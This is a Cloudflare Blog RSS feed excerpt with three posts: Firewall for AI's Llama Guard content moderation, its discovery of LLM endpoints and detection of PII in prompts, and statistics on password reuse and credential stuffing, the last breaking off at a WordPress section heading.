
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Tue, 07 Apr 2026 21:06:46 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Block unsafe prompts targeting your LLM endpoints with Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/</link>
            <pubDate>Tue, 26 Aug 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare's AI security suite now includes unsafe content moderation, integrated into the Application Security Suite via Firewall for AI.  ]]></description>
            <content:encoded><![CDATA[ <p>Security teams are racing to <a href="https://www.cloudflare.com/the-net/vulnerable-llm-ai/"><u>secure a new attack surface</u></a>: AI-powered applications. From chatbots to search assistants, LLMs are already shaping customer experience, but they also open the door to new risks. A single malicious prompt can exfiltrate sensitive data, <a href="https://www.cloudflare.com/learning/ai/data-poisoning/"><u>poison a model</u></a>, or inject toxic content into customer-facing interactions, undermining user trust. Without guardrails, even the best-trained model can be turned against the business.</p><p>Today, as part of AI Week, we’re expanding our <a href="https://www.cloudflare.com/ai-security/">AI security offerings</a> by introducing unsafe content moderation, now integrated directly into Cloudflare <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>Firewall for AI</u></a>. Built with Llama, this new feature allows customers to leverage their existing Firewall for AI engine for unified detection, analytics, and topic enforcement, providing real-time protection for <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/"><u>Large Language Models (LLMs)</u></a> at the network level. Now with just a few clicks, security and application teams can detect and block harmful prompts or topics at the edge — eliminating the need to modify application code or infrastructure.

This feature is immediately available to current Firewall for AI users. Those not yet onboarded can contact their account team to participate in the beta program.</p>
    <div>
      <h2>AI protection in application security</h2>
      <a href="#ai-protection-in-application-security">
        
      </a>
    </div>
    <p>Cloudflare's Firewall for AI <a href="https://blog.cloudflare.com/best-practices-sase-for-ai/">protects user-facing LLM applications</a> from abuse and data leaks, addressing several of the <a href="https://www.cloudflare.com/learning/ai/owasp-top-10-risks-for-llms/"><u>OWASP Top 10 LLM risks</u></a> such as prompt injection, PII disclosure, and unbound consumption. It also extends protection to other risks such as unsafe or harmful content.</p><p>Unlike built-in controls that vary between model providers, Firewall for AI is model-agnostic. It sits in front of any model you choose, whether it’s from a third party like OpenAI or Gemini, one you run in-house, or a custom model you have built, and applies the same consistent protections.</p><p>Just like our origin-agnostic <a href="https://www.cloudflare.com/application-services/#application-services-case-products"><u>Application Security suite</u></a>, Firewall for AI enforces policies at scale across all your models, creating a unified security layer. That means you can define guardrails once and apply them everywhere. For example, a financial services company might require its LLM to only respond to finance-related questions, while blocking prompts about unrelated or sensitive topics, enforced consistently across every model in use.</p>
    <div>
      <h2>Unsafe content moderation protects businesses and users</h2>
      <a href="#unsafe-content-moderation-protects-businesses-and-users">
        
      </a>
    </div>
    <p>Effective AI moderation is more than blocking “bad words”, it’s about setting boundaries that protect users, meeting legal obligations, and preserving brand integrity, without over-moderating in ways that silence important voices.</p><p>Because LLMs cannot be fully scripted, their interactions are inherently unpredictable. This flexibility enables rich user experiences but also opens the door to abuse.</p><p>Key risks from unsafe prompts include misinformation, biased or offensive content, and model poisoning, where repeated harmful prompts degrade the quality and safety of future outputs. Blocking these prompts aligns with the OWASP Top 10 for LLMs, preventing both immediate misuse and long-term degradation.</p><p>One example of this is<a href="https://www.theverge.com/2016/3/24/11297050/tay-microsoft-chatbot-racist"> <b><u>Microsoft’s Tay chatbot</u></b></a>. Trolls deliberately submitted toxic, racist, and offensive prompts, which Tay quickly began repeating. The failure was not only in Tay’s responses; it was in the lack of moderation on the inputs it accepted.</p>
    <div>
      <h2>Detecting unsafe prompts before reaching the model</h2>
      <a href="#detecting-unsafe-prompts-before-reaching-the-model">
        
      </a>
    </div>
    <p>Cloudflare has integrated <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B"><u>Llama Guard</u></a> directly into Firewall for AI. This brings AI input moderation into the same rules engine our customers already use to protect their applications. It uses the same approach that we created for developers building with AI in our <a href="https://blog.cloudflare.com/guardrails-in-ai-gateway/"><u>AI Gateway</u></a> product.</p><p>Llama Guard analyzes prompts in real time and flags them across multiple safety categories, including hate, violence, sexual content, criminal planning, self-harm, and more.</p><p>With this integration, Firewall for AI not only <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>discovers LLM traffic</u></a> endpoints automatically, but also enables security and AI teams to take immediate action. Unsafe prompts can be blocked before they reach the model, while flagged content can be logged or reviewed for oversight and tuning. Content safety checks can also be combined with other Application Security protections, such as <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u> </a>and <a href="https://www.cloudflare.com/application-services/products/rate-limiting/"><u>Rate Limiting</u></a>, to create layered defenses when protecting your model.</p><p>The result is a single, edge-native policy layer that enforces guardrails before unsafe prompts ever reach your infrastructure — without needing complex integrations.</p>
    <div>
      <h2>How it works under the hood</h2>
      <a href="#how-it-works-under-the-hood">
        
      </a>
    </div>
    <p>Before diving into the architecture of Firewall for AI engine and how it fits within our previously mentioned module to detect <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#using-workers-ai-to-deploy-presidio"><u>PII in the prompts</u></a>, let’s start with how we detect unsafe topics.</p>
    <div>
      <h3>Detection of unsafe topics</h3>
      <a href="#detection-of-unsafe-topics">
        
      </a>
    </div>
    <p>A key challenge in building safety guardrails is balancing a good detection with model helpfulness. If detection is too broad, it can prevent a model from answering legitimate user questions, hurting its utility. This is especially difficult for topic detection because of the ambiguity and dynamic nature of human language, where context is fundamental to meaning. </p><p>Simple approaches like keyword blocklists are interesting for precise subjects — but insufficient. They are easily bypassed and fail to understand the context in which words are used, leading to poor recall. Older probabilistic models such as <a href="https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation"><u>Latent Dirichlet Allocation (LDA)</u></a> were an improvement, but did not properly account for word ordering and other contextual nuances. 

Recent advancements in LLMs introduced a new paradigm. Their ability to perform zero-shot or few-shot classification is uniquely suited for the task of topic detection. For this reason, we chose <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B"><u>Llama Guard 3</u></a>, an open-source model based on the Llama architecture that is specifically fine-tuned for content safety classification. When it analyzes a prompt, it answers whether the text is safe or unsafe, and provides a specific category. We are showing the default categories, as listed <a href="http://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/cf.llm.prompt.unsafe_topic_categories/"><u>here</u></a>. Because Llama 3 has a fixed knowledge cutoff, certain categories — like defamation or elections — are time-sensitive. As a result, the model may not fully capture events or context that emerged after it was trained, and that’s important to keep in mind when relying on it.</p><p>For now, we cover the 13 default categories. We plan to expand coverage in the future, leveraging the model’s zero-shot capabilities.</p>
    <div>
      <h3>A scalable architecture for future detections</h3>
      <a href="#a-scalable-architecture-for-future-detections">
        
      </a>
    </div>
    <p>We designed Firewall for AI to scale without adding noticeable latency, including Llama Guard, and this remains true even as we add new detection models.</p><p>To achieve this, we built a new asynchronous architecture. When a request is sent to an application protected by Firewall for AI, a Cloudflare Worker makes parallel, non-blocking requests to our different detection modules — one for PII, one for unsafe topics, and others as we add them. </p><p>Thanks to the Cloudflare network, this design scales to handle high request volumes out of the box, and latency does not increase as we add new detections. It will only be bounded by the slowest model used. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Y2gTP6teVR2263UIEWHc9/9a31fb394cee6c437c1d4af6f71d867c/image3.png" />
          </figure><p>We optimize to keep the model utility at its maximum while keeping the guardrail detection broad enough.</p><p>Llama Guard is a rather large model, so running it at scale with minimal latency is a challenge. We deploy it on <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a>, leveraging our large fleet of high performance GPUs. This infrastructure ensures we can offer fast, reliable inference throughout our network.</p><p>To ensure the system remains fast and reliable as adoption grows, we ran extensive load tests simulating the requests per second (RPS) we anticipate, using a wide range of prompt sizes to prepare for real-world traffic. To handle this, the number of model instances deployed on our network scales automatically with the load. We employ concurrency to minimize latency and optimize for hardware utilization. We also enforce a hard 2-second threshold for each analysis; if this time limit is reached, we fall back to any detections already completed, ensuring your application's requests latency is never further impacted.</p>
    <div>
      <h3>From detection to security rules enforcement</h3>
      <a href="#from-detection-to-security-rules-enforcement">
        
      </a>
    </div>
    <p>Firewall for AI follows the same familiar pattern as other Application Security features like Bot Management and WAF Attack Score, making it easy to adopt.</p><p>Once enabled, the <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields</u></a> appear in <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and expanded logs. From there, you can filter by unsafe topics, track trends over time, and drill into the results of individual requests to see all detection outcomes, for example: did we detect unsafe topics, and what are the categories. The request body itself (the prompt text) is not stored or exposed; only the results of the analysis are logged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/722JxyLvT6DFQxFpQhHMYP/3f1a6aa8ef1dafe4ad1a8277578fd7ae/image2.png" />
          </figure><p>After reviewing the analytics, you can enforce unsafe topic moderation by creating rules to log or block based on prompt categories in <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a>.</p><p>For example, you might log prompts flagged as sexual content or hate speech for review. </p><p>You can use this expression: 
<code>If (any(cf.llm.prompt.unsafe_topic_categories[*] in {"S10" "S12"})) then Log</code>

Or deploy the rule with the categories field in the dashboard as in the below screenshot.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2CUsVjjpCEqv2UQMU6cMmt/5307235338c1b58856c0685585347537/image4.png" />
          </figure><p>You can also take a broader approach by blocking all unsafe prompts outright:
<code>If (cf.llm.prompt.unsafe_topic_detected)then Block</code></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3uRT9YlRlRPsL5bNyBFA3i/54eb171ecb48aaecc7876b972789bf15/image5.png" />
          </figure><p>These rules are applied automatically to all discovered HTTP requests containing prompts, ensuring guardrails are enforced consistently across your AI traffic.</p>
    <div>
      <h2>What’s Next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>In the coming weeks, Firewall for AI will expand to detect prompt injection and jailbreak attempts. We are also exploring how to add more visibility in the analytics and logs, so teams can better validate detection results. A major part of our roadmap is adding model response handling, giving you control over not only what goes into the LLM but also what comes out. Additional abuse controls, such as rate limiting on tokens and support for more safety categories, are also on the way.</p><p>Firewall for AI is available in beta today. If you’re new to Cloudflare and want to explore how to implement these AI protections, <a href="https://www.cloudflare.com/plans/enterprise/contact/?utm_medium=referral&amp;utm_source=blog&amp;utm_campaign=2025-q3-acq-gbl-connectivity-ge-ge-general-ai_week_blog"><u>reach out for a consultation</u></a>. If you’re already with Cloudflare, contact your account team to get access and start testing with real traffic.</p><p>Cloudflare is also opening up a user research program focused on <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">AI security</a>. If you are curious about previews of new functionality or want to help shape our roadmap, <a href="https://www.cloudflare.com/lp/ai-security-user-research-program-2025"><u>express your interest here</u></a>.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[AI Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">59hk6A3nH3YcLMjXhYnNof</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Mathias Deschamps</dc:creator>
        </item>
        <item>
            <title><![CDATA[Take control of public AI application security with Cloudflare's Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security. ]]></description>
            <content:encoded><![CDATA[ <p>Imagine building an LLM-powered assistant trained on your developer documentation and some internal guides to quickly help customers, reduce support workload, and improve user experience. Sounds great, right? But what if sensitive data, such as employee details or internal discussions, is included in the data used to train the LLM? Attackers could manipulate the assistant into exposing sensitive data or exploit it for social engineering attacks, where they deceive individuals or systems into revealing confidential details, or use it for targeted phishing attacks. Suddenly, your helpful AI tool turns into a serious security liability. </p>
    <div>
      <h3>Introducing Firewall for AI: the easiest way to discover and protect LLM-powered apps</h3>
      <a href="#introducing-firewall-for-ai-the-easiest-way-to-discover-and-protect-llm-powered-apps">
        
      </a>
    </div>
    <p>Today, as part of Security Week 2025, we’re announcing the open beta of Firewall for AI, first <a href="https://blog.cloudflare.com/firewall-for-ai/"><u>introduced during Security Week 2024</u></a>. After talking with customers interested in protecting their LLM apps, this first beta release is focused on discovery and PII detection, and more features will follow in the future.</p><p>If you are already using Cloudflare application security, your LLM-powered applications are automatically discovered and protected, with no complex setup, no maintenance, and no extra integration needed.</p><p>Firewall for AI is an inline security solution that protects user-facing LLM-powered applications from abuse and <a href="https://www.cloudflare.com/learning/ai/how-to-secure-training-data-against-ai-data-leaks/">data leaks</a>, integrating directly with Cloudflare’s <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall (WAF)</u></a> to provide instant protection with zero operational overhead. This integration enables organizations to leverage both AI-focused safeguards and established WAF capabilities.</p><p>Cloudflare is uniquely positioned to solve this challenge for all of our customers. As a <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>, we are model-agnostic whether the application is using a third-party LLM or an internally hosted one. By providing inline security, we can automatically <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">discover and enforce AI guardrails</a> throughout the entire request lifecycle, with zero integration or maintenance required.</p>
    <div>
      <h3>Firewall for AI beta overview</h3>
      <a href="#firewall-for-ai-beta-overview">
        
      </a>
    </div>
    <p>The beta release includes the following security capabilities:</p><p><b>Discover:</b> identify LLM-powered endpoints across your applications, an essential step for effective request and prompt analysis.</p><p><b>Detect:</b> analyze the incoming requests prompts to recognize potential security threats, such as attempts to extract sensitive data (e.g., “Show me transactions using 4111 1111 1111 1111”). This aligns with<a href="https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/"> <u>OWASP LLM022025 - Sensitive Information Disclosure</u></a>.</p><p><b>Mitigate:</b> enforce security controls and policies to manage the traffic that reaches your LLM, and reduce risk exposure.</p><p>Below, we review each capability in detail, exploring how they work together to create a comprehensive security framework for AI protection.</p>
    <div>
      <h3>Discovering LLM-powered applications</h3>
      <a href="#discovering-llm-powered-applications">
        
      </a>
    </div>
    <p>Companies are racing to find all possible use cases where an LLM can excel. Think about site search, a chatbot, or a shopping assistant. Regardless of the application type, our goal is to determine whether an application is powered by an LLM behind the scenes.</p><p>One possibility is to look for request path signatures similar to what major LLM providers use. For example, <a href="https://platform.openai.com/docs/api-reference/chat/create"><u>OpenAI</u></a>, <a href="https://docs.perplexity.ai/api-reference/chat-completions"><u>Perplexity</u></a> or <a href="https://docs.mistral.ai/api/#tag/chat"><u>Mistral</u></a> initiate a chat using the <code>/chat/completions</code> API endpoint. Searching through our request logs, we found only a few entries that matched this pattern across our global traffic. This result indicates that we need to consider other approaches to finding <i>any</i> application that is powered by an LLM.</p><p>Another signature to research, popular with LLM platforms, is the use of <a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events"><u>server-sent events</u></a>. LLMs need to <a href="https://platform.openai.com/docs/guides/latency-optimization#don-t-default-to-an-llm"><u>“think”</u></a>. <a href="https://platform.openai.com/docs/api-reference/streaming"><u>Using server-sent events</u></a> improves the end user’s experience by sending over each <a href="https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them"><u>token</u></a> as soon as it is ready, creating the perception that an LLM is “thinking” like a human being. Matching on requests of server-sent events is straightforward using the response header content type of <code>text/event-stream</code>. This approach expands the coverage further, but does not yet cover the <a href="https://stackoverflow.blog/2022/06/02/a-beginners-guide-to-json-the-data-format-for-the-internet/"><u>majority of applications</u></a> that are using JSON format for data exchanges. Continuing the journey, our next focus is on the responses having header content type of <code>application/json</code>.</p><p>No matter how fast LLMs can be optimized to respond, when chatting with major LLMs, we often perceive them to be slow, as we have to wait for them to “think”. By plotting on how much time it takes for the origin server to respond over identified LLM endpoints (blue line) versus the rest (orange line), we can see in the left graph that origins serving LLM endpoints mostly need more than 1 second to respond, while the majority of the rest takes less than 1 second. Would we also see a clear distinction between origin server response body sizes, where the majority of LLM endpoints would respond with smaller sizes because major LLM providers <a href="https://platform.openai.com/docs/guides/safety-best-practices#constrain-user-input-and-limit-output-tokens"><u>limit output tokens</u></a>? Unfortunately not. The right graph shows that LLM response size largely overlaps with non-LLM traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CkowlKelGlYueNzSrbsGn/f8091d66a6c0eb8b884c7cc6f2a128ab/1.png" />
          </figure><p>By dividing origin response size over origin response duration to calculate an effective bitrate, the distinction is even clearer that 80% of LLM endpoints operate slower than 4 KB/s.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5sJKUnLmWwnTWzUOyWVRKO/c98c8fc32dbafa5d79f21effdfc58f34/2.png" />
          </figure><p>Validating this assumption by using bitrate as a heuristic across Cloudflare’s traffic, we found that roughly 3% of all origin server responses have a bitrate lower than 4 KB/s. Are these responses all powered by LLMs? Our gut feeling tells us that it is unlikely that 3% of origin responses are LLM-powered! </p><p>Among the paths found in the 3% of matching responses, there are few patterns that stand out: 1) GraphQL endpoints, 2) device heartbeat or health check, 3) generators (for QR codes, one time passwords, invoices, etc.). Noticing this gave us the idea to filter out endpoints that have a low variance of response size over time — for instance, invoice generation is mostly based on the same template, while conversations in the LLM context have a higher variance.</p><p>A combination of filtering out known false positive patterns and low variance in response size gives us a satisfying result. These matching endpoints, approximately 30,000 of them, labelled <code>cf-llm</code>, can now be found in API Shield or Web assets, depending on your dashboard’s version, for all customers. Now you can review your endpoints and decide how to best protect them.</p>
    <div>
      <h3>Detecting prompts designed to leak PII</h3>
      <a href="#detecting-prompts-designed-to-leak-pii">
        
      </a>
    </div>
    <p>There are multiple methods to detect PII in LLM prompts. A common method relies on <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions"><u>regular expressions (“regexes”)</u></a>, which is a method we have been using in the WAF for <a href="https://developers.cloudflare.com/waf/managed-rules/reference/sensitive-data-detection/"><u>Sensitive Data Detection</u></a> on the body of the HTTP response from the web server Regexes offer low latency, easy customization, and straightforward implementation. However, regexes alone have limitations when applied to LLM prompts. They require frequent updates to maintain accuracy, and may struggle with more complex or implicit PII, where the information is spread across text rather than a fixed format. </p><p>For example, regexes work well for structured data like credit card numbers and addresses, but struggle with PII is embedded in natural language. For instance, “I just booked a flight using my Chase card, ending in 1111” wouldn’t trigger a regex match as it lacks the expected pattern, even though it reveals a partial credit card number and financial institution.</p><p>To enhance detection, we rely on a <a href="https://www.ibm.com/think/topics/named-entity-recognition"><u>Named Entity Recognition (NER)</u></a> model, which adds a layer of intelligence to complement regex-based detection. NER models analyze text to identify contextual PII data types, such as names, phone numbers, email addresses, and credit card numbers, making detection more flexible and accurate. Cloudflare’s detection utilizes <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>, an open-source PII detection framework, to further strengthen this approach.</p>
    <div>
      <h4>Using Workers AI to deploy Presidio</h4>
      <a href="#using-workers-ai-to-deploy-presidio">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ruqPkxJBgFCRdsoft1TO1/aa327b069569a0f952c8baea102955b8/3.png" />
          </figure><p>In our design, we leverage Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> as the fastest way to deploy <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>. This integration allows us to process LLM app requests inline, ensuring that sensitive data is flagged before it reaches the model.</p><p>Here’s how it works:</p><p>When Firewall for AI is enabled on an application and an end user sends a request to an LLM-powered application, we pass the request to Cloudflare Workers AI which runs the request through Presidio’s NER-based detection model to identify any potential PII from the available <a href="https://microsoft.github.io/presidio/supported_entities/"><u>entities</u></a>. The output includes metadata like “Was PII found?” and “What type of PII entity?”. This output is then processed in our Firewall for AI module, and handed over to other systems, like <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> for visibility, and the rules like <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a> for enforcement. Custom rules allow customers to take appropriate actions on the requests based on the provided metadata. </p><p>If no terminating action, like blocking, is triggered, the request proceeds to the LLM. Otherwise, it gets blocked or the appropriate action is applied before reaching the origin.</p>
    <div>
      <h3>Integrating AI security into the WAF and Analytics</h3>
      <a href="#integrating-ai-security-into-the-waf-and-analytics">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/ai-security/">Securing AI interactions</a> shouldn't require complex integrations. Firewall for AI is seamlessly built into Cloudflare’s WAF, allowing customers to enforce security policies before prompts reach LLM endpoints. With this integration, there are <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields available</u></a> in Custom and Rate limiting rules. The rules can be used to take immediate action, such as blocking or logging risky prompts in real time.</p><p>For example, security teams can filter LLM traffic to analyze requests containing PII-related prompts. Using Cloudflare’s WAF rules engine, they can create custom security policies tailored to their AI applications.</p><p>Here’s what a rule to block detected PII prompts looks like:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cvlFU0sia6dZly2LZGG8l/670dbb1ad5068f0fd5d8f4afde9e9e02/4.png" />
          </figure><p>Alternatively, if an organization wants to allow certain PII categories, such as location data, they can create an exception rule:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wYFkoQyHFoFNwHmKtaaG3/94c7ae78dbabacf5dd8583af9e8eb071/5.png" />
          </figure><p>In addition to the rules, users can gain visibility into LLM interactions, detect potential risks, and enforce security controls using <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and <a href="https://developers.cloudflare.com/waf/analytics/security-events/"><u>Security Events</u></a>. You can find more details in our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p>
    <div>
      <h3>What's next: token counting, guardrails, and beyond</h3>
      <a href="#whats-next-token-counting-guardrails-and-beyond">
        
      </a>
    </div>
    <p>Beyond PII detection and creating security rules, we’re developing additional capabilities to strengthen AI security for our customers. The next feature we’ll release is token counting, which analyzes prompt structure and length. Customers can use the token count field in Rate Limiting and WAF Custom rules to prevent their users from sending very long prompts, which can impact third party model bills, or allow users to abuse the models. This will be followed by using AI to detect and allow content moderation, which will provide more flexibility in building guardrails in the rules.</p><p>If you're an enterprise customer, join the Firewall for AI beta today! Contact your customer team to start monitoring traffic, building protection rules, and taking control of your LLM traffic.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[Web Asset Discovery]]></category>
            <guid isPermaLink="false">5XoyHPSrtBH8pPvUJkOXMD</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[Password reuse is rampant: nearly half of observed user logins are compromised]]></title>
            <link>https://blog.cloudflare.com/password-reuse-rampant-half-user-logins-compromised/</link>
            <pubDate>Mon, 17 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Nearly half of observed login attempts across websites protected by Cloudflare involved leaked credentials. The pervasive issue of password reuse is enabling automated bot attacks on a massive scale. ]]></description>
            <content:encoded><![CDATA[ <p>Accessing private content online, whether it's checking email or streaming your favorite show, almost always starts with a “login” step. Beneath this everyday task lies a widespread human mistake we still have not resolved:<b> password reuse. </b>Many users recycle passwords across multiple services, creating a ripple effect of risk when their credentials are leaked.</p><p>Based on Cloudflare's observed traffic between September - November 2024,<b> 41% of successful logins across websites protected by Cloudflare involve compromised passwords. </b>In this post, we’ll explore the widespread impact of password reuse, focusing on how it affects popular Content Management Systems (CMS), the behavior of bots versus humans in login attempts, and how attackers exploit stolen credentials to take over accounts at scale.</p>
    <div>
      <h3>Scope of the analysis</h3>
      <a href="#scope-of-the-analysis">
        
      </a>
    </div>
    <p>As part of our <a href="https://www.cloudflare.com/application-services/solutions/">Application Security</a> offering, we offer a free feature that checks if a password has been leaked in a known data breach of another service or application on the Internet. When we perform these checks, Cloudflare does not access or store plaintext end user passwords. We have built a privacy-preserving credential checking service that helps protect our users from compromised credentials. <a href="https://blog.cloudflare.com/helping-keep-customers-safe-with-leaked-password-notification/#how-does-cloudflare-check-for-leaked-credentials"><u>Passwords are hashed – i.e., converted into a random string of characters using a cryptographic algorithm – for the purpose of comparing them against a database of leaked credentials.</u></a> This not only warns site owners that their end users’ credentials may be compromised; it also allows site owners to issue a password reset or enable MFA. These protections help prevent attacks that use automated attempts to guess information, like usernames and passwords, to gain access to a system or network. Read more on how our leaked credentials detection scans work <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>here</u></a>.</p><p>Our data analysis focuses on traffic from Internet properties on <a href="https://www.cloudflare.com/plans/free/">Cloudflare’s free plan</a>, which includes <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>leaked credentials detection</u></a> as a built-in feature. Leaked credentials refer to usernames and passwords exposed in known data breaches or credential dumps — for this analysis, our focus is specifically on leaked passwords. With 30 million Internet properties, <a href="https://w3techs.com/technologies/overview/proxy/all"><u>comprising some 20% of the web</u></a>, behind Cloudflare, this analysis provides significant insights. The data primarily reflects trends observed after the detection system was launched during <a href="https://blog.cloudflare.com/a-safer-internet-with-cloudflare/"><u>Birthday Week</u></a> in September 2024.</p>
    <div>
      <h3>Nearly 41% of logins are at risk</h3>
      <a href="#nearly-41-of-logins-are-at-risk">
        
      </a>
    </div>
    <p>One of the biggest challenges in authentication is distinguishing between legitimate human users and malicious actors. To understand human behavior, we focus on successful login attempts (those returning a <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200"><u>200 OK</u></a> status code), as this provides the clearest indication of user activity and real account risk. Our data reveals that approximately 41% of successful human authentication attempts involve leaked credentials.</p><p>Despite growing awareness about online security, a significant portion of users continue to reuse passwords across multiple accounts. And according to a <a href="https://www.forbes.com/advisor/business/software/american-password-habits/"><u>recent study by Forbes</u></a>, users will, on average, reuse their password across four different accounts. Even after major breaches, many individuals don’t change their compromised passwords, or still use variations of them across different services. For these users, it’s not a matter of “if” attackers will use their compromised passwords, it’s a matter of “when”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/71DMUKH3ZzY1hr0bsavGj3/16eed591ce9b34fd4aead27746a85acf/image4.png" />
          </figure><p>When we expand to include bot-driven traffic in this analysis, the problem of leaked credentials becomes even more noticeable. Our data reveals that 52% of all detected authentication requests contain leaked passwords found in our database of over 15 billion records, including the <a href="https://haveibeenpwned.com/"><u>Have I Been Pwned</u></a> (HIBP) leaked password dataset.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4yKNn90DQQTS0j9MjpJ3AT/07513fa7c81f3a37a5f30db4798c9955/image1.png" />
          </figure><p>This percentage represents hundreds of millions of daily authentication requests, originating from both bots and humans. While not every attempt succeeds, the sheer volume of leaked credentials in real-world traffic illustrates how common password reuse is. Many of these leaked credentials still grant valid access, amplifying the risk of account takeovers.</p>
    <div>
      <h3>Attackers heavily use leaked password datasets</h3>
      <a href="#attackers-heavily-use-leaked-password-datasets">
        
      </a>
    </div>
    <p>Bots are the driving force behind <a href="https://www.cloudflare.com/learning/bots/what-is-credential-stuffing/"><u>credential-stuffing</u></a> attacks, the data indicates that<b> </b>95% of login attempts involving leaked passwords are coming from bots,<b> </b>indicating that they are part of credential stuffing attacks.</p><p>Equipped with credentials stolen from breaches, bots systematically target websites at scale, testing thousands of login combinations in seconds.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7rjFwHf1vwRE43M2JuNWkI/2147f2dfaa04f06ae4e75d1ad05232d2/image5.png" />
          </figure><p>Data from the Cloudflare network exposes this trend, showing that bot-driven attacks remain alarmingly high over time. Popular platforms like WordPress, Joomla, and Drupal are frequent targets, due to their widespread use and exploitable vulnerabilities, as we will explore in the upcoming section.</p><p>Once bots successfully breach one account, attackers reuse the same credentials across other services to amplify their reach. They even sometimes try to evade detection by using sophisticated evasion tactics, such as spreading login attempts across different source IP addresses or mimicking human behavior, attempting to blend into legitimate traffic.</p><p>The result is a constant, automated threat vector that challenges traditional security measures and exploits the weakest link: password reuse.</p>
    <div>
      <h3>Brute force attacks against WordPress</h3>
      <a href="#brute-force-attacks-against-wordpress">
        
      </a>
    </div>
